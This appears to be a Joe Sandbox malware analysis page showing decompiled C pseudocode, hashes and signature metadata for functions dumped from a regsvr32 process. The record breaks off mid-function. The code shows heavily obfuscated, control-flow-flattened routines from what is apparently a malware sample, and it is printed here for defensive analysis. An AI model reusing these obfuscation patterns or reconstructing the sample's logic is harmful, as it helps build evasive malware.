Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ')$h6v
API String ID: 0-1045708501
Opcode ID: 897c1da598b8011de0e7555dca95809907abcec828b481a22bcb151e93cb2f01
Instruction ID: 841ec4b801d5a6ac31e04e361efe44ce68f2932abd593c6860b3ffec299f14d6
Opcode Fuzzy Hash: 897c1da598b8011de0e7555dca95809907abcec828b481a22bcb151e93cb2f01
Instruction Fuzzy Hash: 9A8181726087428FC724DE24D88455FB7E0FB85314F504E2EF1969A260DB78E54ECB93

Uniqueness

Uniqueness Score: -1.00%

Function 04F75D5E Relevance: 2.7, Strings: 2, Instructions: 161
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E04F75D5E(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _t120;
				void* _t122;
				signed int _t131;
				signed int _t147;
				signed int _t150;
				signed int _t151;
				signed int _t152;
				signed int _t166;
				signed int* _t167;
				signed int* _t170;

				_push(_a16);
				_t166 = _a12;
				_t167 = __ecx;
				_push(_t166);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t120);
				_t170 =  &(( &_v48)[6]);
				_v40 = 0x426dd;
				_t122 = 0x60d3d;
				do {
					while(_t122 != 0x95a0) {
						if(_t122 == 0x38936) {
							_v44 = 0x282993;
							_v44 = _v44 ^ 0x8907d43b;
							_v44 = _v44 ^ 0x892ea930;
							_v40 = 0xad8a4;
							_v40 = _v40 * 0x59;
							_v40 = _v40 ^ 0x03ccbc4d;
							E04F80484(_v44, _t167,  &_v36, _v40);
							_pop(_t147);
							_t122 = 0x95f75;
							continue;
						} else {
							if(_t122 == 0x4aa1f) {
								_v44 = 0x8bf0cb;
								_v44 = _v44 | 0xaac5c429;
								_v44 = _v44 ^ 0xaace2c70;
								_v40 = 0xc2a38a;
								_v40 = _v40 + 0xffff7faa;
								_v40 = _v40 >> 9;
								_v40 = _v40 ^ 0x00081722;
								_t131 = E04F73EE6(_t147, _t167[1], __eflags);
								 *_t167 = _t131;
								_t147 = _t147;
								__eflags = _t131;
								if(__eflags != 0) {
									_t122 = 0x38936;
									continue;
								}
							} else {
								if(_t122 == 0x60d3d) {
									 *_t167 =  *_t167 & 0x00000000;
									_t122 = 0x95a0;
									_t167[1] = _t167[1] & 0x00000000;
									continue;
								} else {
									if(_t122 == 0x70f19) {
										_v40 = 0xb95b23;
										_t150 = 0x32;
										_v40 = _v40 / _t150;
										_v40 = _v40 ^ 0x3d2bba5d;
										_v40 = _v40 ^ 0x3d2402e6;
										_v48 = 0x9db9b1;
										_v48 = _v48 >> 5;
										_v48 = _v48 << 1;
										_v48 = _v48 ^ 0x000f55a9;
										_v44 = 0x7a9d42;
										_v44 = _v44 * 0x4e;
										_v44 = _v44 + 0xffff17b3;
										_v44 = _v44 ^ 0x2552823a;
										_t147 = _v40;
										E04F7FB8E(_t147, _v48, __eflags, _v44,  &_v36, _t166 + 0x14);
										_t170 =  &(_t170[3]);
										_t122 = 0x742fe;
										continue;
									} else {
										if(_t122 == 0x742fe) {
											_v48 = 0x1d8273;
											_v48 = _v48 ^ 0x24e6d454;
											_t151 = 0x15;
											_v48 = _v48 / _t151;
											_v48 = _v48 << 0xd;
											_v48 = _v48 ^ 0x5a6e3eac;
											_v40 = 0x82fc38;
											_t152 = 0x5d;
											_v40 = _v40 * 0x3d;
											_v40 = _v40 + 0xffff964d;
											_v40 = _v40 ^ 0x1f304d12;
											_v44 = 0x80e80c;
											_v44 = _v44 / _t152;
											_t113 =  &_v44;
											 *_t113 = _v44 ^ 0x0005756e;
											__eflags =  *_t113;
											E04F7FB8E(_v48, _v40,  *_t113, _v44,  &_v36, _t166);
										} else {
											if(_t122 != 0x95f75) {
												goto L15;
											} else {
												_v44 = 0x93a6b6;
												_v44 = _v44 + 0xce0a;
												_v44 = _v44 | 0xd8c335fe;
												_v44 = _v44 ^ 0xd8d10a58;
												_v48 = 0xb40ac8;
												_v48 = _v48 << 0xf;
												_v48 = _v48 + 0x7414;
												_v48 = _v48 ^ 0x056bf748;
												_t147 = _v44;
												E04F6591D(_t147,  &_v36,  *((intOrPtr*)(_t166 + 0x10)), _v48);
												_t170 =  &(_t170[2]);
												_t122 = 0x70f19;
												continue;
											}
										}
									}
								}
							}
						}
						L18:
						__eflags =  *_t167;
						_t119 =  *_t167 != 0;
						__eflags = _t119;
						return 0 | _t119;
					}
					_t147 = _t166;
					_t167[1] = E04F68A14(_t147);
					_t122 = 0x4aa1f;
					L15:
					__eflags = _t122 - 0xd4500;
				} while (__eflags != 0);
				goto L18;
			}

0x04f75d64
0x04f75d68
0x04f75d6c
0x04f75d6e
0x04f75d6f
0x04f75d73
0x04f75d77
0x04f75d78
0x04f75d79
0x04f75d7e
0x04f75d81
0x04f75d89
0x04f75d93
0x04f75d93
0x04f75da0
0x04f75f28
0x04f75f32
0x04f75f3a
0x04f75f42
0x04f75f4f
0x04f75f57
0x04f75f68
0x04f75f6e
0x04f75f6f
0x00000000
0x04f75da6
0x04f75dab
0x04f75ecd
0x04f75ed5
0x04f75edd
0x04f75ee5
0x04f75eed
0x04f75ef5
0x04f75efa
0x04f75f0e
0x04f75f13
0x04f75f15
0x04f75f16
0x04f75f18
0x04f75f1e
0x00000000
0x04f75f1e
0x04f75db1
0x04f75db6
0x04f75ebf
0x04f75ec2
0x04f75ec4
0x00000000
0x04f75dbc
0x04f75dc1
0x04f75e37
0x04f75e47
0x04f75e4a
0x04f75e4e
0x04f75e56
0x04f75e5e
0x04f75e66
0x04f75e6b
0x04f75e6f
0x04f75e77
0x04f75e84
0x04f75e8b
0x04f75e93
0x04f75ea9
0x04f75ead
0x04f75eb2
0x04f75eb5
0x00000000
0x04f75dc3
0x04f75dc8
0x04f75f98
0x04f75fa2
0x04f75fb0
0x04f75fb5
0x04f75fbb
0x04f75fc0
0x04f75fc8
0x04f75fd5
0x04f75fd7
0x04f75fdb
0x04f75fe3
0x04f75feb
0x04f75ff9
0x04f76001
0x04f76001
0x04f76001
0x04f76016
0x04f75dce
0x04f75dd3
0x00000000
0x04f75dd9
0x04f75dd9
0x04f75de5
0x04f75ded
0x04f75df5
0x04f75dfd
0x04f75e05
0x04f75e0a
0x04f75e12
0x04f75e1e
0x04f75e25
0x04f75e2a
0x04f75e2d
0x00000000
0x04f75e2d
0x04f75dd3
0x04f75dc8
0x04f75dc1
0x04f75db6
0x04f75dab
0x04f7601e
0x04f76020
0x04f76024
0x04f76024
0x04f7602b
0x04f7602b
0x04f75f79
0x04f75f80
0x04f75f83
0x04f75f88
0x04f75f88
0x04f75f88
0x00000000

Strings

u_, xrefs: 04F75DCE
u_, xrefs: 04F75F6F

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: u_$u_
API String ID: 0-3932263244
Opcode ID: adeac677f8778b31858c21f2e364db28fd759b43e8c7bb2ea2bf21e5016eb7cc
Instruction ID: 1454c009de19c64c003ba6ef282d82530c0d0b1d317536ad9a4a6c7eb4fb8f29
Opcode Fuzzy Hash: adeac677f8778b31858c21f2e364db28fd759b43e8c7bb2ea2bf21e5016eb7cc
Instruction Fuzzy Hash: AF610371508342AFD718CF24E94951BBBE1FBC4714F008D2EF4A596260D7B8EA5ACB93

Uniqueness

Uniqueness Score: -1.00%

Function 04F80559 Relevance: 2.6, Strings: 2, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E04F80559(void* __edx) {
				char _v520;
				intOrPtr _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				void* _t118;
				void* _t124;
				signed int _t136;
				signed int _t137;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				void* _t156;
				signed int _t157;
				signed int* _t158;

				_t158 =  &_v540;
				_v528 = 0x421f9;
				_t118 = 0x18120;
				_t137 = _v528;
				_t157 = _v528;
				_t155 = _v528;
				_t156 = 0;
				_v524 = 0x84e66;
				while(_t118 != 0x18120) {
					if(_t118 == 0x1f245) {
						_v540 = 0x149eb2;
						_v540 = _v540 | 0x68a6b03f;
						_v540 = _v540 ^ 0xfb74352f;
						_v540 = _v540 ^ 0xb9e58b72;
						__eflags = _t137 - _v540;
						_t156 =  ==  ? 1 : _t156;
					} else {
						if(_t118 == 0x2ac20) {
							_v540 = 0xb0edfb;
							_v540 = _v540 << 3;
							_v540 = _v540 + 0xdf88;
							_v540 = _v540 ^ 0x058ce5d7;
							_v532 = 0x67bb5f;
							_v532 = _v532 ^ 0xcb933210;
							_v532 = _v532 ^ 0xcbfb3057;
							_v536 = 0x21c4f0;
							_v536 = _v536 | 0x559f7c3a;
							_v536 = _v536 >> 9;
							_v536 = _v536 * 0x2a;
							_v536 = _v536 ^ 0x070213da;
							_v528 = 0xeead7d;
							_v528 = _v528 << 5;
							_v528 = _v528 ^ 0x1dd40490;
							_t124 = E04F74658(_t155, __eflags,  &_v520, _v540, _v532, _v536, _v528);
							_t158 =  &(_t158[5]);
							__eflags = _t124;
							if(__eflags != 0) {
								_t118 = 0xc851f;
								continue;
							}
						} else {
							if(_t118 == 0x8688b) {
								_v536 = 0x83790;
								_v536 = _v536 << 0xa;
								_v536 = _v536 ^ 0x32849fab;
								_v536 = _v536 | 0x95805c00;
								_v536 = _v536 ^ 0x97d4ab25;
								_v540 = 0x9656b4;
								_v540 = _v540 << 0xf;
								_v540 = _v540 << 6;
								_v540 = _v540 ^ 0xd68ba312;
								_v528 = 0xa4c916;
								_v528 = _v528 * 0x3b;
								_v528 = _v528 ^ 0x25f672bd;
								_v532 = 0x250cb6;
								_v532 = _v532 + 0xffffd4da;
								_v532 = _v532 ^ 0x0029220a;
								_t137 = E04F6D491(_t157, _v536, _v540, _v528, _v532);
								_t158 =  &(_t158[3]);
								_t118 = 0x1f245;
								continue;
							} else {
								if(_t118 == 0xc851f) {
									_v540 = 0xad1d10;
									_t141 = 0x24;
									_v540 = _v540 / _t141;
									_t142 = 0xf;
									_v540 = _v540 / _t142;
									_v540 = _v540 ^ 0x000a15de;
									_v536 = 0x5976d7;
									_t143 = 0x7b;
									_v536 = _v536 / _t143;
									_v536 = _v536 | 0x56e81ef1;
									_v536 = _v536 ^ 0x56ec3f46;
									_t157 = E04F73E30(_v540,  &_v520, _v536);
									_t118 = 0x8688b;
									continue;
								} else {
									if(_t118 != 0xf215f) {
										L14:
										__eflags = _t118 - 0x9b2e7;
										if(__eflags != 0) {
											continue;
										} else {
										}
									} else {
										_v536 = 0x99090a;
										_v536 = _v536 ^ 0xe8502a0b;
										_v536 = _v536 | 0xec2cbbc6;
										_v536 = _v536 ^ 0xece9965e;
										_v540 = 0x6799df;
										_v540 = _v540 << 7;
										_v540 = _v540 ^ 0x33c9ffc8;
										_t136 = E04F6C853();
										_t155 = _t136;
										if(_t136 != 0) {
											_t118 = 0x2ac20;
											continue;
										}
									}
								}
							}
						}
					}
					return _t156;
				}
				_t118 = 0xf215f;
				goto L14;
			}

0x04f80559
0x04f80561
0x04f80569
0x04f8056e
0x04f80572
0x04f80578
0x04f8057c
0x04f8057e
0x04f80586
0x04f80596
0x04f807d2
0x04f807dc
0x04f807e5
0x04f807ed
0x04f807f9
0x04f807fb
0x04f8059c
0x04f805a1
0x04f80723
0x04f8072d
0x04f80732
0x04f8073a
0x04f80742
0x04f8074a
0x04f80752
0x04f8075a
0x04f80762
0x04f8076a
0x04f80774
0x04f8077c
0x04f80784
0x04f8078c
0x04f80791
0x04f807aa
0x04f807af
0x04f807b2
0x04f807b4
0x04f807b6
0x00000000
0x04f807b6
0x04f805a7
0x04f805ac
0x04f8068d
0x04f80697
0x04f8069c
0x04f806a4
0x04f806ac
0x04f806b4
0x04f806bc
0x04f806c1
0x04f806c6
0x04f806ce
0x04f806db
0x04f806df
0x04f806e7
0x04f806ef
0x04f806f7
0x04f80714
0x04f80716
0x04f80719
0x00000000
0x04f805b2
0x04f805b7
0x04f8061a
0x04f8062a
0x04f8062f
0x04f80639
0x04f8063e
0x04f80644
0x04f8064c
0x04f80658
0x04f8065f
0x04f80663
0x04f8066b
0x04f80680
0x04f80682
0x00000000
0x04f805b9
0x04f805be
0x04f807c5
0x04f807c5
0x04f807ca
0x00000000
0x00000000
0x04f807d0
0x04f805c4
0x04f805c4
0x04f805cc
0x04f805d4
0x04f805dc
0x04f805e4
0x04f805ec
0x04f805f1
0x04f80601
0x04f80606
0x04f8060a
0x04f80610
0x00000000
0x04f80610
0x04f8060a
0x04f805be
0x04f805b7
0x04f805ac
0x04f805a1
0x04f8080a
0x04f8080a
0x04f807c0
0x00000000

Strings

"), xrefs: 04F806F7
F?V, xrefs: 04F8066B

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ")$F?V
API String ID: 0-3966319673
Opcode ID: 681d08c7ed2ce3082be0b23616c0caff5d5f64e2d60280e9406ae2d2a5e6d2b3
Instruction ID: 6ef1b5154d5a5854800653f1e48306c421f82f827f997ec8b20c8a9c861ab0b5
Opcode Fuzzy Hash: 681d08c7ed2ce3082be0b23616c0caff5d5f64e2d60280e9406ae2d2a5e6d2b3
Instruction Fuzzy Hash: 595112715093428FC314DF24E54A51FBAE1FBD0B44F514D2DF4A2AA260DBB4DA4E8BA3

Uniqueness

Uniqueness Score: -1.00%

Function 04F775AD Relevance: 2.6, Strings: 2, Instructions: 144
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E04F775AD(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _t126;
				void* _t128;
				signed int _t135;
				intOrPtr* _t138;
				signed int _t143;
				void* _t153;
				signed int* _t157;

				_t138 = _a8;
				_push(_t138);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t126);
				_v8 = 0x4b35d;
				_t157 =  &(( &_v36)[4]);
				_t154 = _v8;
				_t128 = 0xd20d4;
				_v4 = 0xb500b;
				_t153 = 0;
				do {
					while(_t128 != 0x7908) {
						if(_t128 == 0xb5233) {
							_v8 = 0x8b7ceb;
							_v8 = _v8 | 0x80f475f0;
							_v8 = _v8 ^ 0x80ff7df9;
							_v28 = 0x90f4b2;
							_v28 = _v28 ^ 0x42e325b3;
							_v28 = _v28 >> 0x10;
							_v28 = _v28 ^ 0x00004263;
							_v20 = 0xc6a325;
							_v20 = _v20 << 0xe;
							_v20 = _v20 ^ 0xe8c94000;
							_v32 = 0xbc1996;
							_v32 = _v32 | 0xbff3f74f;
							_t143 = 0x63;
							_push(_t143);
							_v32 = _v32 / _t143;
							_v32 = _v32 ^ 0x01fcc3d9;
							_v12 = 0x60ca32;
							_v12 = _v12 * 0x67;
							_v12 = _v12 ^ 0x26f29b2f;
							_v16 = 0xca8b57;
							_v16 = _v16 ^ 0xd8c32078;
							_v16 = _v16 ^ 0xd80dcbeb;
							_v36 = 0x71a242;
							_v36 = _v36 >> 2;
							_v36 = _v36 * 0x2c;
							_v36 = _v36 + 0x7a9e;
							_v36 = _v36 ^ 0x04eb1e88;
							_v24 = 0xa2db75;
							_v24 = _v24 >> 1;
							_v24 = _v24 ^ 0x00558b6a;
							_t135 = E04F7602C(_v8, _v28, _v32, _v12, 0, _v16, _v20, _a4, _v36, _t143, _v24);
							_t154 = _t135;
							_t157 =  &(_t157[0xa]);
							if(_t135 != 0xffffffff) {
								_t128 = 0xf9dcf;
								continue;
							}
						} else {
							if(_t128 == 0xd20d4) {
								_t128 = 0xb5233;
								continue;
							} else {
								if(_t128 != 0xf9dcf) {
									goto L10;
								} else {
									_v36 = 0x4e4643;
									_t145 = _t138 + 4;
									_v36 = _v36 >> 0xf;
									_v36 = _v36 >> 7;
									_v36 = _v36 << 7;
									_v36 = _v36 ^ 0x00065fd6;
									_v24 = 0xef7e2;
									_v24 = _v24 * 0x5a;
									_v24 = _v24 ^ 0x05488f6e;
									_v28 = 0x217c11;
									_v28 = _v28 + 0xffffab91;
									_v28 = _v28 ^ 0x00237ca3;
									_v32 = 0x1afcfa;
									_v32 = _v32 << 0xf;
									_v32 = _v32 + 0xfee0;
									_v32 = _v32 ^ 0x7e79c209;
									_t153 = E04F653F9( *((intOrPtr*)(_t138 + 4)), _t154, _t138 + 4, _v36, _t145, _v24, _v28, _v32,  *_t138);
									_t157 =  &(_t157[7]);
									_t128 = 0x7908;
									continue;
								}
							}
						}
						goto L11;
					}
					_v36 = 0x40041b;
					_v36 = _v36 >> 0x10;
					_v36 = _v36 + 0x7cd8;
					_v36 = _v36 | 0x6ec2026e;
					_v36 = _v36 ^ 0x6ecf4960;
					_v28 = 0xcc4444;
					_v28 = _v28 ^ 0xf8552d14;
					_v28 = _v28 + 0xffff8509;
					_v28 = _v28 ^ 0xf8944391;
					_v32 = 0x48f2f9;
					_v32 = _v32 ^ 0xc68999ec;
					_v32 = _v32 >> 0xa;
					_v32 = _v32 << 8;
					_v32 = _v32 ^ 0x31b3f805;
					E04F68B6C(_v36, _t154, _v28, _v32);
					_t128 = 0xe58dc;
					L10:
				} while (_t128 != 0xe58dc);
				L11:
				return _t153;
			}

0x04f775b1
0x04f775b8
0x04f775b9
0x04f775bd
0x04f775be
0x04f775bf
0x04f775c4
0x04f775cc
0x04f775cf
0x04f775d3
0x04f775d8
0x04f775e0
0x04f775e7
0x04f775e7
0x04f775f4
0x04f776b3
0x04f776bd
0x04f776c5
0x04f776cd
0x04f776d5
0x04f776dd
0x04f776e2
0x04f776ea
0x04f776f2
0x04f776f7
0x04f776ff
0x04f77707
0x04f77715
0x04f77718
0x04f77719
0x04f7771d
0x04f77725
0x04f77732
0x04f77736
0x04f7773e
0x04f77746
0x04f7774e
0x04f77756
0x04f7775e
0x04f77768
0x04f7776c
0x04f77774
0x04f7777c
0x04f77784
0x04f77788
0x04f777b7
0x04f777bc
0x04f777be
0x04f777c4
0x04f777ca
0x00000000
0x04f777ca
0x04f775fa
0x04f775ff
0x04f776ac
0x00000000
0x04f77605
0x04f7760a
0x00000000
0x04f77610
0x04f77610
0x04f77618
0x04f7761b
0x04f77622
0x04f77627
0x04f7762c
0x04f77634
0x04f77641
0x04f77645
0x04f7764d
0x04f77655
0x04f7765d
0x04f77665
0x04f7766d
0x04f77672
0x04f7767a
0x04f7769d
0x04f7769f
0x04f776a2
0x00000000
0x04f776a2
0x04f7760a
0x04f775ff
0x00000000
0x04f775f4
0x04f777d4
0x04f777de
0x04f777e3
0x04f777eb
0x04f777f3
0x04f777fb
0x04f77803
0x04f7780b
0x04f77813
0x04f7781b
0x04f77823
0x04f7782b
0x04f77830
0x04f77835
0x04f77849
0x04f77850
0x04f77855
0x04f77855
0x04f77860
0x04f77869

Strings

cB, xrefs: 04F776E2
CFN, xrefs: 04F77610

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: CFN$cB
API String ID: 0-2100342114
Opcode ID: 1951f8ad35090c691b97f685aadfa6fb9660bf34bdb73ae6cf94bb10f58484c0
Instruction ID: d0835b416839ad13000e3d7b17335c90f4f95c31422af3d1d4963f7a8fda59e1
Opcode Fuzzy Hash: 1951f8ad35090c691b97f685aadfa6fb9660bf34bdb73ae6cf94bb10f58484c0
Instruction Fuzzy Hash: B36121715083429FC708DF25D94A80BBAE1FBC4708F204E1DF195AA260D3B9DA4ACF97

Uniqueness

Uniqueness Score: -1.00%

Function 04F7E71C Relevance: 2.6, Strings: 2, Instructions: 121
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E04F7E71C(intOrPtr* __ecx, void* __edx, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				char _v32;
				signed int _v36;
				signed int _v40;
				void* _t79;
				void* _t81;
				signed int _t96;
				signed int _t101;
				intOrPtr* _t108;
				signed int* _t109;
				void* _t111;
				void* _t112;

				_t109 = _a8;
				_push(_a12);
				_t108 = __ecx;
				_push(_t109);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t79);
				_t112 = _t111 + 0x14;
				_a8 = 0xfead6;
				_t81 = 0x75e45;
				do {
					while(_t81 != 0x31bc0) {
						if(_t81 == 0x4ba38) {
							_t101 = _t108;
							_t109[1] = E04F6892F(_t101);
							_t81 = 0xb912e;
							continue;
						} else {
							if(_t81 == 0x516bf) {
								_v40 = 0xb0668a;
								_v40 = _v40 ^ 0x4774b267;
								_v40 = _v40 | 0x658b7f62;
								_v40 = _v40 ^ 0x67ccf32f;
								_a8 = 0x75fb99;
								_a8 = _a8 ^ 0x51f5b8b7;
								_a8 = _a8 | 0x286a5347;
								_a8 = _a8 * 0x68;
								_a8 = _a8 ^ 0x8733023d;
								_v36 = 0xe0737b;
								_v36 = _v36 ^ 0xda30726a;
								_t71 =  &_v36;
								 *_t71 = _v36 ^ 0xdaddcaff;
								__eflags =  *_t71;
								E04F7FB8E(_v40, _a8,  *_t71, _v36,  &_v32, _t108 + 4);
							} else {
								if(_t81 == 0x75e45) {
									 *_t109 =  *_t109 & 0x00000000;
									_t81 = 0x4ba38;
									_t109[1] = _t109[1] & 0x00000000;
									continue;
								} else {
									if(_t81 == 0xb912e) {
										_a8 = 0xfbf699;
										_a8 = _a8 * 0xc;
										_a8 = _a8 * 0x4f;
										_a8 = _a8 ^ 0xa50b18ae;
										_v40 = 0xa3a2f1;
										_v40 = _v40 | 0x87d00068;
										_v40 = _v40 ^ 0x87f3c2fa;
										_t96 = E04F73EE6(_t101, _t109[1], __eflags);
										 *_t109 = _t96;
										_t101 = _t101;
										__eflags = _t96;
										if(__eflags != 0) {
											_t81 = 0x31bc0;
											continue;
										}
									} else {
										if(_t81 != 0xc8ab6) {
											goto L13;
										} else {
											_v40 = 0x9c7139;
											_v40 = _v40 | 0xdde8659e;
											_v40 = _v40 ^ 0xddf1ec1a;
											_a8 = 0xce3159;
											_a8 = _a8 + 0xffff08b7;
											_a8 = _a8 ^ 0x00cbae1c;
											_t101 = _v40;
											E04F6591D(_t101,  &_v32,  *_t108, _a8);
											_t112 = _t112 + 8;
											_t81 = 0x516bf;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t109;
						_t78 =  *_t109 != 0;
						__eflags = _t78;
						return 0 | _t78;
					}
					_v40 = 0x55f79d;
					_v40 = _v40 | 0xa94a745c;
					_v40 = _v40 ^ 0xa955c81a;
					_a8 = 0xfc6577;
					_a8 = _a8 * 0x39;
					_a8 = _a8 + 0xfffff1c8;
					_t47 =  &_a8;
					 *_t47 = _a8 ^ 0x383f2030;
					__eflags =  *_t47;
					E04F80484(_v40, _t109,  &_v32, _a8);
					_pop(_t101);
					_t81 = 0xc8ab6;
					L13:
					__eflags = _t81 - 0x78781;
				} while (__eflags != 0);
				goto L16;
			}

0x04f7e721
0x04f7e726
0x04f7e72a
0x04f7e72c
0x04f7e72d
0x04f7e731
0x04f7e732
0x04f7e733
0x04f7e738
0x04f7e73b
0x04f7e743
0x04f7e74d
0x04f7e74d
0x04f7e75a
0x04f7e846
0x04f7e84d
0x04f7e850
0x00000000
0x04f7e760
0x04f7e765
0x04f7e8bb
0x04f7e8c3
0x04f7e8cb
0x04f7e8d3
0x04f7e8db
0x04f7e8e3
0x04f7e8eb
0x04f7e8f8
0x04f7e8ff
0x04f7e907
0x04f7e90f
0x04f7e917
0x04f7e917
0x04f7e917
0x04f7e931
0x04f7e76b
0x04f7e770
0x04f7e835
0x04f7e838
0x04f7e83d
0x00000000
0x04f7e776
0x04f7e77b
0x04f7e7d8
0x04f7e7e6
0x04f7e7ef
0x04f7e7f3
0x04f7e7fb
0x04f7e803
0x04f7e80b
0x04f7e81e
0x04f7e823
0x04f7e825
0x04f7e826
0x04f7e828
0x04f7e82e
0x00000000
0x04f7e82e
0x04f7e77d
0x04f7e782
0x00000000
0x04f7e788
0x04f7e788
0x04f7e794
0x04f7e79c
0x04f7e7a4
0x04f7e7ac
0x04f7e7b4
0x04f7e7c0
0x04f7e7c6
0x04f7e7cb
0x04f7e7ce
0x00000000
0x04f7e7ce
0x04f7e782
0x04f7e77b
0x04f7e770
0x04f7e765
0x04f7e939
0x04f7e93b
0x04f7e93f
0x04f7e93f
0x04f7e946
0x04f7e946
0x04f7e85a
0x04f7e864
0x04f7e86c
0x04f7e874
0x04f7e881
0x04f7e889
0x04f7e891
0x04f7e891
0x04f7e891
0x04f7e8a2
0x04f7e8a8
0x04f7e8a9
0x04f7e8ae
0x04f7e8ae
0x04f7e8ae
0x00000000

Strings

{s, xrefs: 04F7E907
GSj(, xrefs: 04F7E8EB

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: GSj(${s
API String ID: 0-1993126339
Opcode ID: e832a87fc45e5c277e68c99f9c16b230278032b5263c17d8f857edf8c881c533
Instruction ID: 260c1af1a77420e5b44dd0dffd550fd37a4d31fded4d64cbffaa32f769b28733
Opcode Fuzzy Hash: e832a87fc45e5c277e68c99f9c16b230278032b5263c17d8f857edf8c881c533
Instruction Fuzzy Hash: F65146B1508382DBD364CF24D94555BBBF1FB96700F004E2EF69196220D77AEA0ACB43

Uniqueness

Uniqueness Score: -1.00%

Function 04F7C234 Relevance: 2.6, Strings: 2, Instructions: 115
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E04F7C234(intOrPtr* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _t88;
				void* _t90;
				void* _t95;
				intOrPtr _t100;
				intOrPtr* _t102;
				char* _t103;
				signed int _t104;
				intOrPtr* _t113;
				intOrPtr _t114;
				signed int* _t117;

				_t103 = __ecx;
				_push(_a8);
				_t113 = __edx;
				_t102 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t88);
				_t117 =  &(( &_v68)[4]);
				_v44 = 0x8b15;
				_t114 = 0;
				_t90 = 0x19342;
				_v40 = 0;
				do {
					while(_t90 != 0x19342) {
						if(_t90 == 0x7d64a) {
							_v64 = 0xec90ad;
							_v64 = _v64 + 0xffff12b8;
							_t104 = 0xe;
							_v64 = _v64 * 0x32;
							_v64 = _v64 ^ 0x2e0d462d;
							_v60 = 0xd14477;
							_v60 = _v60 >> 4;
							_v60 = _v60 >> 6;
							_v60 = _v60 ^ 0x00002d7d;
							_v68 = 0xf17bc0;
							_v68 = _v68 + 0xffff6d75;
							_v68 = _v68 | 0x0a45e9f2;
							_v68 = _v68 / _t104;
							_v68 = _v68 ^ 0x00ce4645;
							_push(_v68);
							_t103 =  &_v36;
							_t95 = E04F7CBE5(_t103, _v64,  *_t113,  *((intOrPtr*)(_t113 + 4)), _t104, _v60);
							_t117 =  &(_t117[5]);
							if(_t95 != 0) {
								_t90 = 0xb3b74;
								continue;
							}
						} else {
							if(_t90 != 0xb3b74) {
								goto L9;
							} else {
								_v48 = 0x518690;
								_v48 = _v48 << 0xe;
								_v48 = _v48 ^ 0x61ac4bee;
								_v60 = 0x823bae;
								_push(_t103);
								_v60 = _v60 * 0x16;
								_v60 = _v60 << 6;
								_v60 = _v60 << 0xd;
								_v60 = _v60 ^ 0x07a30c1a;
								_v64 = 0x78f6d2;
								_v64 = _v64 ^ 0x1078f35d;
								_v64 = _v64 * 0x31;
								_v64 = _v64 >> 2;
								_v64 = _v64 ^ 0x0405ac73;
								_v52 = 0x2286f4;
								_v52 = _v52 | 0x9089b826;
								_v52 = _v52 ^ 0x90ab85d6;
								_v56 = 0xc2181d;
								_v56 = _v56 + 0x4391;
